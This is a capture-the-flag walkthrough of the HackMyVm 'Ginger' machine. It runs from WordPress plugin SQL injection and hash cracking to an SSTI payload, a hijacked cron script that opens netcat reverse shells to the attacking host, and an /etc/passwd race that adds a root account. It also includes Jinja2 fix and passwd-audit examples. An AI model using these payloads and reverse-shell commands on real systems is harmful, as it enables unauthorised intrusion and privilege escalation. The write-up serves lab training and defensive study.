HackMyVm Ginger Walkthrough
https://hackmyvm.eu/machines/machine.php?vm=Ginger
Find the IP of the VM.
```
~ sudo arp-scan --interface eth1 192.168.56.0/24 ...
192.168.56.100 08:00:27:45:72:fc PCS Systemtechnik GmbH
```
Scan ports.
```
~ nmap -sV -sC -p- 192.168.56.100 -oN ports.log
...
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
| 256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
|_ 256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
Enumerate the web server on port 80.
```
~ gobuster dir -u http://192.168.56.100 -t 50 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .html,.php,.txt,.php.bak,.bak,.zip -b 401,403,404,500 --wildcard -o 80.log
/index.html (Status: 200) [Size: 10701]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.56.100/wordpress/]
/latest.zip (Status: 200) [Size: 16866701]
```
Scan the WordPress install for vulnerable plugins.
```
~ wpscan --url http://192.168.56.100/wordpress/ -e ap --no-banner --api-token your_wpscan_token --force --plugins-detection aggressive
...
[+] cp-multi-view-calendar
| Location: http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/
| Last Updated: 2021-03-08T13:47:00.000Z
| Readme: http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/README.txt
| [!] The version is out of date, the latest version is 1.3.99
| [!] Directory listing is enabled
|
| Found By: Known Locations (Aggressive Detection)
| - http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/, status: 200
|
| [!] 2 vulnerabilities identified:
|
| [!] Title: CP Multi View Event Calendar <= 1.1.4 - SQL Injection & XSS
| Fixed in: 1.1.5
| References:
| - https://wpscan.com/vulnerability/50db43be-9fdb-4b5f-bba5-4c0d62689dbf
| - https://www.exploit-db.com/exploits/36243/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli/
|
| [!] Title: CP Multi View Event Calendar <= 1.1.7 - Unauthenticated SQL Injection
| Fixed in: 1.1.8
| References:
| - https://wpscan.com/vulnerability/3bf2665d-2e2d-4cc4-ac5d-7300e9cb1c11
| - https://www.exploit-db.com/exploits/37560/
|
| Version: 1.0.2 (50% confidence)
| Found By: Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.100/wordpress/wp-content/plugins/cp-multi-view-calendar/README.txt
```
Search for the exploit in exploit-db with searchsploit.
```
~ searchsploit CP Multi View Event Calendar
-------------------------------------------------------------------- -----------------------
 Exploit Title                                                      |  Path
-------------------------------------------------------------------- -----------------------
WordPress Plugin CP Multi View Event Calendar 1.01 - SQL Injection  | php/webapps/35073.txt
WordPress Plugin CP Multi View Event Calendar 1.1.7 - SQL Injection | php/webapps/37560.txt
-------------------------------------------------------------------- -----------------------
```
Check 37560.txt for the injection point: the id parameter of the plugin's edit action, reachable without authentication through the WordPress front page. Hand that URL to sqlmap and dump the database.
```
~ sqlmap -u 'http://192.168.56.100/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1' -p id --risk 3 --level 5 --dbs --batch
...
available databases [2]:
[*] information_schema
[*] wordpress_db
```
```
~ sqlmap -u 'http://192.168.56.100/wordpress/?action=data_management&cpmvc_do_action=mvparse&f=edit&id=1' -p id --risk 3 --level 5 -D wordpress_db -T wp_users --dump
...
Table: wp_users
[1 entry]
+----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| ID | user_url | user_pass | user_email | user_login | user_status | display_name | user_nicename | user_registered | user_activation_key |
+----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| 1 | http://192.168.0.14/wordpress | $P$BsyLMheEjjRPfxertXBQWm6Nq8.YBr. | webmaster@gmail.com | webmaster | 0 | webmaster | webmaster | 2021-06-02 05:28:40 | <blank> |
+----+-------------------------------+------------------------------------+---------------------+------------+-------------+--------------+---------------+---------------------+---------------------+
```
Crack the hash with John the Ripper. The $P$ prefix marks a phpass (portable PHP) hash, which john detects automatically; save the hash to hash.txt first. The "?" in the output is just john's placeholder for a missing username.
```
~ john --wordlist=/usr/share/wordlists/rock_ascii.txt hash.txt
~ john --show hash.txt
?:sanitarium
```
Log in to WordPress as webmaster:sanitarium, open the plugin editor, edit akismet.php and insert PHP reverse-shell code pointing back at the attacking host.
Request the modified file to trigger it and catch the reverse shell.
```
~ curl http://192.168.56.100/wordpress/wp-content/plugins/akismet/akismet.php
~ nc -nvlp 1234 ...
Ncat: Connection from 192.168.56.100:34762.
Linux ginger 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64 GNU/Linux
08:28:31 up 14 min, 0 users, load average: 0.00, 0.05, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
Found 3 users in /home.
```
www-data@ginger:/home$ ls -la
ls -la
total 20
drwxr-xr-x 5 root root 4096 May 21 16:30 .
drwxr-xr-x 18 root root 4096 May 19 10:09 ..
drwxr-xr-- 5 caroline webmaster 4096 May 25 08:15 caroline
drwxr-xr-x 4 sabrina sabrina 4096 May 25 08:15 sabrina
drwx------ 4 webmaster webmaster 4096 May 25 08:15 webmaster
```
Found a hint in sabrina's home directory.
```
www-data@ginger:/home/sabrina$ cat password.txt
cat password.txt
I forgot my password again...
I wrote it down somewhere in this form: sabrina:password
but I don't know where... I have to search in my memory
```
The password was written to the kernel log, and dmesg is readable by www-data on this box (kernel.dmesg_restrict is not set), so grep it out.
```
www-data@ginger:/home/sabrina$ dmesg |grep sabrina
dmesg |grep sabrina
[ 6.040104] sabrina:dontforgetyourpasswordbitch
```
Log in via SSH as sabrina and check sudo -l.
```
sabrina@ginger:~$ sudo -l
Matching Defaults entries for sabrina on ginger:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sabrina may run the following commands on ginger:
(webmaster) NOPASSWD: /usr/bin/python /opt/app.py *
```
Check app.py: it is a Flask app on port 5000 that %-formats the name query parameter straight into the template source before calling render_template_string, a textbook server-side template injection (SSTI). It also registers get_user_file as a template global, so arbitrary file reads as webmaster are available from a template even without reaching os.
```python
from flask import Flask, request, render_template_string,render_template
app = Flask(__name__)

@app.route('/')
def hello_ssti():
    person = {'name':"world",'secret':"UGhldmJoZj8gYWl2ZnZoei5wYnovcG5lcnJlZg=="}
    if request.args.get('name'):
        person['name'] = request.args.get('name')
    template = '''<h2>Hello %s!</h2>''' % person['name']
    return render_template_string(template,person=person)

def get_user_file(f_name):
    with open(f_name) as f:
        return f.readlines()

app.jinja_env.globals['get_user_file'] = get_user_file

if __name__ == "__main__":
    app.run(debug=True)
```
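The bug in app.py, reproduced as an added example (this is not code from the walkthrough or from the box). Flask's render_template_string is a thin wrapper over jinja2's Environment.from_string(...).render(...), so the same pattern is shown with jinja2 alone; the only assumption is that the jinja2 package is installed. get_user_file is a stand-in that returns constructed content instead of reading disk. The three renderers show the vulnerable %-formatting, the fix (constant template source, input passed as a variable), and jinja2's SandboxedEnvironment, which blocks the dunder walk that payloads like the one used below depend on but still evaluates injected expressions, so it is a mitigation rather than a fix.

```python
# Added example, not part of the original walkthrough or /opt/app.py.
# Assumes only that Jinja2 is installed (pip install jinja2).
from jinja2 import Environment
from jinja2.sandbox import SandboxedEnvironment
from jinja2.exceptions import SecurityError


def get_user_file(f_name):
    """Stand-in for the global /opt/app.py registers; returns constructed
    content so the demo runs offline instead of reading a real file."""
    return ["constructed content of %s" % f_name]


def _env(cls):
    env = cls(autoescape=True)  # render_template_string autoescapes too
    env.globals["get_user_file"] = get_user_file
    return env


def render_vulnerable(name):
    """Mirror of hello_ssti(): user input is %-formatted INTO the template
    source, so any {{ ... }} the attacker supplies is parsed and executed."""
    template = "<h2>Hello %s!</h2>" % name
    return _env(Environment).from_string(template).render()


def render_fixed(name):
    """Hardened form: the template source is a constant and the user value
    is passed as a context variable, so {{ }} in the input stays text."""
    return _env(Environment).from_string("<h2>Hello {{ name }}!</h2>").render(name=name)


def render_sandboxed(name):
    """Same bug as render_vulnerable, but under SandboxedEnvironment: attribute
    names starting with '_' are refused, so __class__/__globals__/__import__
    walks raise SecurityError. Plain expressions still evaluate."""
    template = "<h2>Hello %s!</h2>" % name
    try:
        return _env(SandboxedEnvironment).from_string(template).render()
    except SecurityError as exc:
        return "blocked: %s" % exc


if __name__ == "__main__":
    probe = "{{7*7}}"
    print(render_vulnerable(probe))  # expression evaluated -> Hello 49!
    print(render_fixed(probe))       # treated as text -> Hello {{7*7}}!
    # A registered global is callable from an injected template:
    print(render_vulnerable("{{ get_user_file('/etc/passwd')[0] }}"))
    # Start of the classic object walk toward __import__; the sandbox stops it:
    walk = "{{ ''.__class__.__mro__ }}"
    print(render_vulnerable(walk))
    print(render_sandboxed(walk))
    print(render_sandboxed(probe))   # still 49: sandbox != input handling fix
```

Run it as a script to see the four cases side by side; the only real fix is render_fixed, which never lets user data into the template source.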
Start the server as webmaster. It binds to 127.0.0.1 only and runs in debug mode, and because we launched it ourselves the Werkzeug debugger PIN lands in our own terminal.
```
sabrina@ginger:~$ sudo -u webmaster python /opt/app.py *
* Serving Flask app "app" (lazy loading)
* Environment: production
WARNING: This is a development server. Do not use it in a production deployment.
Use a production WSGI server instead.
* Debug mode: on
* Running on http://127.0.0.1:5000/ (Press CTRL+C to quit)
* Restarting with stat
* Debugger is active!
* Debugger PIN: 260-511-262
```
In another terminal, forward local port 5000 to the VM's loopback over SSH.
```
~ ssh -L 5000:127.0.0.1:5000 sabrina@192.168.56.100
```
Visit the server with an SSTI payload that walks from the request object to __import__ and runs netcat (the Werkzeug debugger console at /console, unlocked with the PIN printed above, would give code execution as webmaster just as well).
```
http://127.0.0.1:5000/?name={{request.application.__globals__.__builtins__.__import__(%27os%27).popen('nc 192.168.56.150 1234 -e /bin/bash').read()}}
```
At the same time, listen with nc on port 1234 to catch the reverse shell as webmaster.
```
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.56.100.
Ncat: Connection from 192.168.56.100:34772.
id
uid=1001(webmaster) gid=1001(webmaster) groups=1001(webmaster)
```
Fetch our id_rsa.pub from the attacking host into /home/webmaster/.ssh/authorized_keys and chmod it to 600.
```
webmaster@ginger:/home/sabrina$ cd /home/webmaster
cd /home/webmaster
webmaster@ginger:~$ mkdir .ssh
mkdir .ssh
webmaster@ginger:~$ cd .ssh
cd .ssh
webmaster@ginger:~/.ssh$ wget http://192.168.56.150/id_rsa.pub -O authorized_keys
...
Saving to: ‘authorized_keys’
authorized_keys 100%[===================>] 565 --.-KB/s in 0s
webmaster@ginger:~/.ssh$ chmod 600 authorized_keys
chmod 600 authorized_keys
```
Now we can log in via SSH as webmaster.
```
~ ssh webmaster@192.168.56.100
...
webmaster@ginger:~$ id
uid=1001(webmaster) gid=1001(webmaster) groups=1001(webmaster)
```
Upload pspy64 to the VM and watch for scheduled jobs.
```
2021/06/09 04:33:01 CMD: UID=1002 PID=883 | /bin/sh -c bash ~/backup/backup.sh
2021/06/09 04:33:01 CMD: UID=1002 PID=884 | bash /home/caroline/backup/backup.sh
```
UID 1002 is caroline, and /home/caroline/backup is group-owned by webmaster with group write, so webmaster can add and delete files in it.
```
drwxrwx--- 2 caroline webmaster 4096 May 22 13:38 backup
```
Replace /home/caroline/backup/backup.sh with our own script. The file itself is not writable by webmaster (hence rm's write-protected prompt), but deleting and creating an entry only needs write permission on the directory, which webmaster has.
```
webmaster@ginger:/home/caroline$ echo 'nc 192.168.56.150 1234 -e /bin/bash' > /tmp/backup.sh
webmaster@ginger:/home/caroline$ rm backup/backup.sh
rm: remove write-protected regular file 'backup/backup.sh'? yes
webmaster@ginger:/home/caroline$ cp /tmp/backup.sh backup/
```
When the job next runs we get a reverse shell as caroline. Again, install id_rsa.pub for SSH access, then check sudo -l.
```
caroline@ginger:~$ sudo -l
Matching Defaults entries for caroline on ginger:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User caroline may run the following commands on ginger:
(ALL : ALL) NOPASSWD: /srv/code
```
Decompile /srv/code: main just calls system() to make /etc/passwd world-writable for 5 seconds and then revokes it.
```c
int __cdecl main(int argc, const char **argv, const char **envp)
{
  system("chmod o+w /etc/passwd ; sleep 5 ; chmod o-w /etc/passwd");
  return 0;
}
```
Run it in the background so the window stays open, and within those 5 seconds append a new uid-0 user with a crypt(3) password hash in the password field to /etc/passwd (a hash placed there is honoured directly, bypassing /etc/shadow), then su to it.
```
caroline@ginger:/srv$ sudo /srv/code &
[1] 1220
caroline@ginger:/srv$ echo "root2:lyFyPjK/Mcx0M:0:0:root:/root:/bin/bash" >> /etc/passwd
caroline@ginger:/srv$ su root2
Password:
root@ginger:/srv# id;hostname
uid=0(root) gid=0(root) groups=0(root)
ginger
root@ginger:/srv#
```
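The defender's view of that last step, as an added example that is not part of the walkthrough: an audit of /etc/passwd that flags exactly what the root2 line introduces, a second uid-0 account and a password hash stored in passwd instead of shadow. The sample passwd content is constructed for the demo (it reuses the root2 line from above); pass a real file path as the first argument to audit a live system.

```python
# Added example, not from the original walkthrough. Audits /etc/passwd-style
# content for rogue uid-0 accounts and for hashes stored in field 2.
import re
import sys

# Matches a traditional 13-char DES crypt hash (like lyFyPjK/Mcx0M above) or a
# modular-crypt hash such as $1$..., $5$..., $6$..., $y$...
HASH_RE = re.compile(r"^(\$[0-9a-zA-Z]+\$.+|[./0-9A-Za-z]{13})$")

# Constructed sample; only the last line is taken from the walkthrough.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
webmaster:x:1001:1001::/home/webmaster:/bin/bash
caroline:x:1002:1002::/home/caroline:/bin/bash
root2:lyFyPjK/Mcx0M:0:0:root:/root:/bin/bash
"""


def parse_passwd(text):
    """Yield (lineno, fields) for each entry; fields is None when malformed."""
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        yield lineno, (fields if len(fields) == 7 else None)


def audit_passwd(text):
    """Return a list of (lineno, username, reason) findings."""
    findings = []
    for lineno, fields in parse_passwd(text):
        if fields is None:
            findings.append((lineno, None, "malformed entry"))
            continue
        name, pw, uid, gid, gecos, home, shell = fields
        # Any uid-0 account other than root is a backdoor until proven otherwise.
        if uid.isdigit() and int(uid) == 0 and name != "root":
            findings.append((lineno, name, "extra uid-0 account"))
        # 'x' means "look in /etc/shadow"; a real hash here is checked directly
        # by crypt(3), which is how the root2 login above works without shadow.
        if pw not in ("x", "*", "!", "") and HASH_RE.match(pw):
            findings.append((lineno, name, "password hash stored in passwd, not shadow"))
    return findings


if __name__ == "__main__":
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_PASSWD
    for lineno, name, reason in audit_passwd(text):
        print("line %d: %s: %s" % (lineno, name, reason))
```

Both checks fire on the same line here, but either alone is worth alerting on; the hash-in-passwd check also catches the case where the attacker reuses the name root rather than adding root2.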